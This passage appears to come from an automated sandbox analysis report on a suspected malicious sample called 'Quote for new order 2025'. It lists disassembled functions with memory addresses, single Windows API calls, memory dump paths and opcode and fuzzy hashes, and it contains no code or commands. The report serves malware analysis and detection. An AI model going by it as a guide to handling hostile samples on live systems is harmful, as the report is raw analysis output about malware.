                                                                                                                                                        • Instruction ID: 4150a63babb566369c45b8ddb562eceabcbddc0228da335414fd60fd10b2f47e
                                                                                                                                                        • Opcode Fuzzy Hash: e2fd21e672658fad606a11ed8e08673c477ad7d4e19e2efb4d21eb2e5ef7ad10
                                                                                                                                                        • Instruction Fuzzy Hash: 0141BDB1D00349DFDB14CFA9C894ADEBBB5FF48310F24852AE818AB210D7759885CF90
                                                                                                                                                        Function 00977848 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: ad9a5d94354103448a40e4d50b475cc232b59f3f9b1e14f0a0c2aec0703d6f88
                                                                                                                                                        • Instruction ID: 4a0f50bb430693128ac5abfc8142777b2ba82716d2b54a3e935f822028f4c1f3
                                                                                                                                                        • Opcode Fuzzy Hash: ad9a5d94354103448a40e4d50b475cc232b59f3f9b1e14f0a0c2aec0703d6f88
                                                                                                                                                        • Instruction Fuzzy Hash: EB3193B4A40340CFE7009F64E959BA97BB5F789701F25852AE9058B3E5DF740806CF21
                                                                                                                                                        Function 06F5001D Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F500D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: 3dd798a8f8457fefe485a9a70a16a792a62f33a202d6e8cd970a11bb1f661873
                                                                                                                                                        • Instruction ID: db33f0483bed4edc1be096902427550f8e23cb08b619b4265b7e6c004fe06272
                                                                                                                                                        • Opcode Fuzzy Hash: 3dd798a8f8457fefe485a9a70a16a792a62f33a202d6e8cd970a11bb1f661873
                                                                                                                                                        • Instruction Fuzzy Hash: 843104B5D012499FDB10CFAAD880ADEFFF4EF49310F14842AE919A7211C775A945CFA0
                                                                                                                                                        Function 06F50040 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F500D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: bf7b65d0b37aa2d2cf9299ad12e61ef6d78dca0c176aa6082650fb29851831c1
                                                                                                                                                        • Instruction ID: d18ac1933e84c3930a74bed4a6d22af7ae32b3b9da562429dcdaac52c890a26a
                                                                                                                                                        • Opcode Fuzzy Hash: bf7b65d0b37aa2d2cf9299ad12e61ef6d78dca0c176aa6082650fb29851831c1
                                                                                                                                                        • Instruction Fuzzy Hash: 7B21BFB5D002499FDB10CF9AD884AEEFBF5FB48320F14842AE919A7310D775A944CFA4
                                                                                                                                                        Function 00977780 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: c23c0c347f69bc114e4c0f515f97b28a6b825aef9fcf70d6ba9fe866267d294a
                                                                                                                                                        • Instruction ID: fb6c700f5097114e5c3491f26bf5334b1c1000ff5fc81385aee4e166effa0306
                                                                                                                                                        • Opcode Fuzzy Hash: c23c0c347f69bc114e4c0f515f97b28a6b825aef9fcf70d6ba9fe866267d294a
                                                                                                                                                        • Instruction Fuzzy Hash: C121E3B5D002589FDB10CFA9D984AEEFFF4EB48320F14845AE958A7350D374A944CFA1
                                                                                                                                                        Function 06F5F340 Relevance: 1.6, APIs: 1, Instructions: 63windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 06F5F3C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 8eed9145454c6d4c952f8ccc846ed63aaafdc548c856273d9d59e05c3de377a0
                                                                                                                                                        • Instruction ID: dddd0692cbbff82aa4f7691d818fab336d6a6b81bfdfa020c2db574831c236e6
                                                                                                                                                        • Opcode Fuzzy Hash: 8eed9145454c6d4c952f8ccc846ed63aaafdc548c856273d9d59e05c3de377a0
                                                                                                                                                        • Instruction Fuzzy Hash: DF217F718053898FC711CF99C845BDEFFF4AF0A310F14849AD994A7251D334A944CFA1
                                                                                                                                                        Function 06F5FCF8 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 06F5FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: baf1f4c7af1a96fc5ebe41158cb8bff13c24a328639dec4107d07f7d80df4c68
                                                                                                                                                        • Instruction ID: df35815ad98ad2f4de5f2dc61d96d8cddcb61fefe37e36b3b056d9a3bbaa1957
                                                                                                                                                        • Opcode Fuzzy Hash: baf1f4c7af1a96fc5ebe41158cb8bff13c24a328639dec4107d07f7d80df4c68
                                                                                                                                                        • Instruction Fuzzy Hash: 272149B58053499FCB11CF99C844ADEBFF8EF09310F14806AE954A7251C379A944CFA5
                                                                                                                                                        Function 00977788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0097780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 639cb870ac4237a569b15622b0d574b7a1be1935ade864b1d1a09d89a01b0579
                                                                                                                                                        • Instruction ID: 19a80047c9e25e4cdc09650814547c30403647458b1c2bd84920d347f1e0f20a
                                                                                                                                                        • Opcode Fuzzy Hash: 639cb870ac4237a569b15622b0d574b7a1be1935ade864b1d1a09d89a01b0579
                                                                                                                                                        • Instruction Fuzzy Hash: A621E0B59002489FDB10CFAAD984ADEFBF8EB48320F14841AE918A3310D374A940CFA5
                                                                                                                                                        Function 06F5FD00 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 06F5FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: 0af756accebcfa79dccf60aaf57d92c5ae8c716d93728015bbe3a2f8780874b7
                                                                                                                                                        • Instruction ID: be830a84fa6910b7cd33d666d4aeb53ed0fd7fee4c3a26541e99a509a2d70b49
                                                                                                                                                        • Opcode Fuzzy Hash: 0af756accebcfa79dccf60aaf57d92c5ae8c716d93728015bbe3a2f8780874b7
                                                                                                                                                        • Instruction Fuzzy Hash: 7A11D4B5C00249DFDB10CF9AD944BDEFBF8EB48320F14846AE958A7251C379A944CFA5
                                                                                                                                                        Function 06F5F368 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 06F5F3C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 4d44e71d718aa9ef0e31f7bdd609558d486516ff9202134c068a018a4460a7a0
                                                                                                                                                        • Instruction ID: fbcc88360b87efd50f5c699b4ee7a34fdcacd01f8889186029aac5d29d3a5109
                                                                                                                                                        • Opcode Fuzzy Hash: 4d44e71d718aa9ef0e31f7bdd609558d486516ff9202134c068a018a4460a7a0
                                                                                                                                                        • Instruction Fuzzy Hash: 9A11F5B5800349DFDB10CF9AC845BDEFBF8EB48320F14845AE958A3650D379A984CFA5
                                                                                                                                                        Function 06F85F78 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 598a3f93c29b5ee935356ed39334cef8950b2157d226b1d88f7e0f133db64498
                                                                                                                                                        • Instruction ID: 913024790544b5fe4696cd88f6ed95b7b593dd171a5272736b8b7a808a46ae10
                                                                                                                                                        • Opcode Fuzzy Hash: 598a3f93c29b5ee935356ed39334cef8950b2157d226b1d88f7e0f133db64498
                                                                                                                                                        • Instruction Fuzzy Hash: 8011F2B5C046498FCB10DF9AD844BCEFBF4AB48314F10855AE869A3250D779A544CFA5
                                                                                                                                                        Function 0097D6C8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0097D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: a0ef3208b20dac1b6c94d647d6908819ede68c741597fc925cdbd59af2659609
                                                                                                                                                        • Instruction ID: 02209ed8aba8779aaf9c37aab8fabe5c6c69d4f08d7eb95a0e61f778bf5c3f7d
                                                                                                                                                        • Opcode Fuzzy Hash: a0ef3208b20dac1b6c94d647d6908819ede68c741597fc925cdbd59af2659609
                                                                                                                                                        • Instruction Fuzzy Hash: CE11DFB6C002498FCB14CF9AC444ADEFBF9AF88324F14C46AD469A7210C375A545CFA5
                                                                                                                                                        Function 06F80840 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 65235d63e31f805ec9a4937cf80da05cc2fb784b9d9aab76c7537e3064363ad7
                                                                                                                                                        • Instruction ID: 9965e580e9387438dd9919ff72f23f2154f9a26306d023a1978bc8c4a69604e0
                                                                                                                                                        • Opcode Fuzzy Hash: 65235d63e31f805ec9a4937cf80da05cc2fb784b9d9aab76c7537e3064363ad7
                                                                                                                                                        • Instruction Fuzzy Hash: 3A1122B1C00689CFCB14DFAAD844BCEFBF4AF48324F10856AD868A7650C374A184CFA5
                                                                                                                                                        Function 06F80848 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 2144f0d3e5bb021ec7cb021d0e9670b63c0fcfe17c5a0d55139f2e1648c67674
                                                                                                                                                        • Instruction ID: 952a4fb0eba1b0a2be3bedc9a6938320a7e2f5d2ce1a23384fe3a574d1317525
                                                                                                                                                        • Opcode Fuzzy Hash: 2144f0d3e5bb021ec7cb021d0e9670b63c0fcfe17c5a0d55139f2e1648c67674
                                                                                                                                                        • Instruction Fuzzy Hash: 2E110DB5C04248CFCB10DF9AD848BCEFBF4EB48324F10846AD868A3210C378A584CFA5
                                                                                                                                                        Function 06F85F80 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540516506.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f80000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: cf9273b710fe7c6d90051249e190f60ec5807344241ec4c54832009b4ff8c149
                                                                                                                                                        • Instruction ID: 345cb82b58fb0a077c5a09306cb81f0dfa79ddd27bb005a3285ffa700d0be11e
                                                                                                                                                        • Opcode Fuzzy Hash: cf9273b710fe7c6d90051249e190f60ec5807344241ec4c54832009b4ff8c149
                                                                                                                                                        • Instruction Fuzzy Hash: F5110DB5C00249CFCB10DF9AD844BCEFBF4EB48324F10846AE428A3210C378A544CFA5
                                                                                                                                                        Function 0091D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 701daaa30d120e330c7511b8070aa06389c2cb56aab599a70c1713ed23620212
                                                                                                                                                        • Instruction ID: 22c13c2b49839b5ecc56d7bde8060ae8bcb46438f44b40f25dfb14b480f5db0b
                                                                                                                                                        • Opcode Fuzzy Hash: 701daaa30d120e330c7511b8070aa06389c2cb56aab599a70c1713ed23620212
                                                                                                                                                        • Instruction Fuzzy Hash: 2E213A71600208DFDB05DF14D9C0B57BF66FB98318F20C569F9094B25AC33AD896C7A1
                                                                                                                                                        Function 0092D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 51b6f7a480602b5946ad1c3a6fa3b77853afdbca52c117dac41fe2c12d668841
                                                                                                                                                        • Instruction ID: 2bddf3b86d9739dc06a6ea9b461b7957475a8066b57442d81ea045af3bf53545
                                                                                                                                                        • Opcode Fuzzy Hash: 51b6f7a480602b5946ad1c3a6fa3b77853afdbca52c117dac41fe2c12d668841
                                                                                                                                                        • Instruction Fuzzy Hash: 19213871505200EFDB05DF14E9C4B26BBA9FB84314F30CA6DE8094B39AC33AD846CBA1
                                                                                                                                                        Function 0092D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: df555bb4e833e8253f1f650bc9caac427fef9ce093c447a38eb4693294251e74
                                                                                                                                                        • Instruction ID: e67be6ec47da65fe01206f061023b07c8bc12db2b33ac71551561c1aa7ff5ca8
                                                                                                                                                        • Opcode Fuzzy Hash: df555bb4e833e8253f1f650bc9caac427fef9ce093c447a38eb4693294251e74
                                                                                                                                                        • Instruction Fuzzy Hash: 61210471684240DFDB14DF14E9C4B26BFA5FB84314F20C96DD94A4B2AAC33AD847CA61
                                                                                                                                                        Function 0092D488 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 74912257832bb2fbf58b161744b63fccf4ac6b93d46a732a6577514296eac4db
                                                                                                                                                        • Instruction ID: 0d4c04cdb73a7f5b1c355003844359c77d23be55364dee2b0485cbdf5af2aedd
                                                                                                                                                        • Opcode Fuzzy Hash: 74912257832bb2fbf58b161744b63fccf4ac6b93d46a732a6577514296eac4db
                                                                                                                                                        • Instruction Fuzzy Hash: 21213B71505200DFDB00DF14E9C4F26BB69FB84318F30C569E8094B25DC37AE845C7A1
                                                                                                                                                        Function 0092D2D4 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9672a5afce040b35f4244c658a6d3fc4402d71e02f6f9c672e45ee93a7dcf479
                                                                                                                                                        • Instruction ID: d16729cdf1f52a1c3a474c8413235bbd45d8c17effeae5fcb0149f71d8cdd299
                                                                                                                                                        • Opcode Fuzzy Hash: 9672a5afce040b35f4244c658a6d3fc4402d71e02f6f9c672e45ee93a7dcf479
                                                                                                                                                        • Instruction Fuzzy Hash: 88213AB1505240DFDB04DF14E6C4B2AFBA9FBD4718F34C66DD8494B259C339D80AC6A2
                                                                                                                                                        Function 0092D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 47106e2d41ded9f6a2745f2ce540a3f5759bb339527f9d697c531e3a89be47cb
                                                                                                                                                        • Instruction ID: 8eee50aea14903699d97710137ab6406f1c687cf2df050c965c8924062d8fd12
                                                                                                                                                        • Opcode Fuzzy Hash: 47106e2d41ded9f6a2745f2ce540a3f5759bb339527f9d697c531e3a89be47cb
                                                                                                                                                        • Instruction Fuzzy Hash: 23218E755493808FCB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                                                                                                        Function 0091D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                        • Instruction ID: 2a617ad610c04defbaa9873cd5515bca363082bf5157ae379c4a8bdfe7babe0c
                                                                                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                        • Instruction Fuzzy Hash: B311E676504244CFDB16CF14D5C4B56BF72FB94318F24C6A9ED090B25AC33AD85ACBA1
                                                                                                                                                        Function 0092D483 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction ID: f93364e2bd0e1da38e241a9fa3fbe3b89b732e5b86597de19faa98c0d9466a06
                                                                                                                                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction Fuzzy Hash: EA11C475505280CFDB12CF14E5C4B16FF71FB94328F24C6AAE8494B65AC37AD84ACB92
                                                                                                                                                        Function 0092D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction ID: 64786dc3d6172fa57387e94bab897888fac8c8f358f860c7735b50c7d2bc3d82
                                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction Fuzzy Hash: A9118B75504280DFDB16CF14D5C4B15BBA1FB84314F24C6AAD8494B69AC33AD84ACBA1
                                                                                                                                                        Function 0092D2CF Relevance: .1, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528504362.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_92d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction ID: 8101471dbc4408f8041a25e67ebe1cccc07697c515e1afe77a7c73a4f753257d
                                                                                                                                                        • Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction Fuzzy Hash: 27110272505280CFDB15CF14E5C471AFFB5FB94318F24C6AAD8494B65AC33AD80ACB92
                                                                                                                                                        Function 0091D75D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528369788.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_91d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: eb8edf394c2ec1c200a955f4c657d2144f7e75ede97a855299ce11c4419d6714
                                                                                                                                                        • Instruction ID: d8186054bc106691c9f064fc7478f232034ef18dfdb5064087987f92e2b55439
                                                                                                                                                        • Opcode Fuzzy Hash: eb8edf394c2ec1c200a955f4c657d2144f7e75ede97a855299ce11c4419d6714
